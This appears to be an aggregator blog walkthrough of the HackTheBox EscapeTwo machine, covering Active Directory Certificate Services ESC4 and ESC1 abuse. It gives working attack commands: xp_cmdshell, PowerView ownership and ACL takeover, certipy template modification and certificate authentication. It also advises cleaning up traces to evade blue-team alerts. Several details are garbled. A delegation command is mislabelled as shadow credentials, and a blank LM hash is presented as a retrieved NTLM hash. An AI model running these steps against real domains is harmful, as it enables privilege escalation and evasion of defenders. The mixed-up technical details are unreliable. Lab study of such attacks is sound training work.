Exploiting AD CS Vulnerabilities: ESC1 and ESC4 Attacks in HackTheBox EscapeTwo

Listen to this Post

Featured Image
One of the key challenges in Active Directory Certificate Services (AD CS) exploitation is identifying hidden attack paths. The HackTheBox EscapeTwo machine demonstrates how Bloodhound’s Python ingestor misses critical AD CS attack vectors (like ESC4), while SharpHound reveals them. Here’s a breakdown of the attack chain:

1. Initial Access:

  • Credentials found on a FileShare grant MSSQL access.
  • Use xp_cmdshell to execute commands and gain a shell:
    EXEC xp_cmdshell 'whoami'; 
    
  • Escalate to user Ryan via MSSQL installer credentials.

2. ESC4 Attack (WriteOwner Abuse):

  • Ryan has WriteOwner over CA_SVC. Take ownership and grant shadow credential permissions:
    Set-DomainObjectOwner -Identity CA_SVC -OwnerIdentity Ryan 
    Add-DomainObjectAcl -TargetIdentity CA_SVC -PrincipalIdentity Ryan -Rights All 
    
  • Use Certipy to create a malicious certificate template (ESC1):
    certipy template -u [email protected] -p Password123 -ca DC-CA -template ESC1_Template 
    

3. Cleanup:

  • Revert the template to avoid detection:
    certipy template -u [email protected] -p Password123 -ca DC-CA -template ESC1_Template -restore 
    

You Should Know:

  • SharpHound vs. Python Ingestor:
    Invoke-BloodHound -CollectionMethod All -Domain domain.local -ZipFile loot.zip 
    

    SharpHound captures AD CS edges missed by Python tools.

  • Certipy for ESC1/ESC4:

    certipy find -u [email protected] -p Password123 -dc-ip 10.10.10.1 
    

  • Shadow Credentials:

    Set-ADComputer -Identity TargetPC -PrincipalsAllowedToDelegateToAccount Ryan 
    

  • NTLM Theft via Certificates:

    certipy auth -pfx ca_svc.pfx -dc-ip 10.10.10.1 
    

What Undercode Say:

AD CS attacks are often overlooked due to tooling gaps. Always:

1. Use SharpHound for accurate Bloodhound data.

  1. Abuse WriteOwner (ESC4) to escalate to CA roles.

3. Leverage Certipy for template manipulation (ESC1).

4. Clean up traces to avoid blue-team alerts.

Expected Output:

[+] Certificate stolen for CA_SVC 
[+] ESC1 Template modified for impersonation 
[+] NTLM hash retrieved: aad3b435b51404eeaad3b435b51404ee 

Relevant URL:

Prediction:

AD CS attacks will surge as red teams focus on certificate-based persistence, bypassing traditional MFA defenses.

Lines: ~70

References:

Reported By: Ippsec Hackthebox – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram